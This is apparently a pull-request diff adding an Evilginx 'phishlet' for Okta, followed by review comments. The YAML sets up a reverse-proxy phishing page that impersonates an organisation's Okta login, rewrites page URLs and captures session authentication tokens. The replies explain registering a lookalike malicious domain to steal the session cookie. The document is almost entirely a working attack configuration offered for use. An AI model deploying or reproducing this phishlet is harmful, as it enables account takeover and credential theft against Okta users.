phishlets/okta.yaml

```diff
@@ -0,0 +1,25 @@
+name: 'okta'
+author: '@ml_siegel'
+min_ver: '2.1.0'
+# Replace EXAMPLE with the target org. ie ACME for acme.okta.com
+# Replace the auth_token domain with your malicious domain ie acmeokta.com 
+proxy_hosts:
+  - {phish_sub: 'login', orig_sub: 'login', domain: 'okta.com', session: true, is_landing: true}
+  - {phish_sub: '', orig_sub: '', domain: 'okta.com', session: true, is_landing: true }
+  - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'okta.com', session: true, is_landing: true}
+sub_filters:
+  - {hostname: 'EXAMPLE.okta.com', sub: 'EXAMPLE', domain: 'okta.com', search: 'https://{hostname}/api', replace: 'https://{hostname}/api', mimes: ['text/html', 'application/json']}
+  - {hostname: 'login.okta.com', sub: 'login', domain: 'okta.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
+  - {hostname: 'EXAMPLE.okta.com', sub: '', domain: 'EXAMPLE.okta.com', search: 'https\\x3A\\x2F\\x2F{hostname}', replace: 'https\x3A\x2F\x2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript', 'text/javascript']}
+  - {hostname: 'EXAMPLE.okta.com', sub: '', domain: 'EXAMPLE.okta.com', search: '\\x2Fuser\\x2Fnotifications', replace: 'https\x3A\x2F\x2FEXAMPLE.okta.com\x2Fuser\x2Fnotifications', mimes: ['text/html', 'application/json', 'application/x-javascript', 'text/javascript']}
+auth_tokens:
+  - domain: 'EXAMPLEokta.com'
```

Comment:
Should this be EXAMPLE.okta.com?

Reply:
What I did when I used it was register EXAMPLEokta.com as the malicious domain to impersonate EXAMPLE.okta.com. SO EXAMPLEokta.com is equivilant to PHISH_DOMAIN in evilginx version 1.  Maybe evilokta.com would be more clear for reference purposes?

Reply:
Makes sense, however it actually worked fine when I used EXAMPLE.okta.com in 2.2.0. I think that's how most of the other phishlets are configured (to use the legit domain instead of the evil domain). I assume it does a replace internally because the cookie actually lands on the evil domain.

Reply:
Ok, I'll update.